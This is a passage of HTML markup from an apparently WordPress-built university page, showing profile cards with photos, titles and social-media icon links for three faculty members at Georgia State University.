align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div 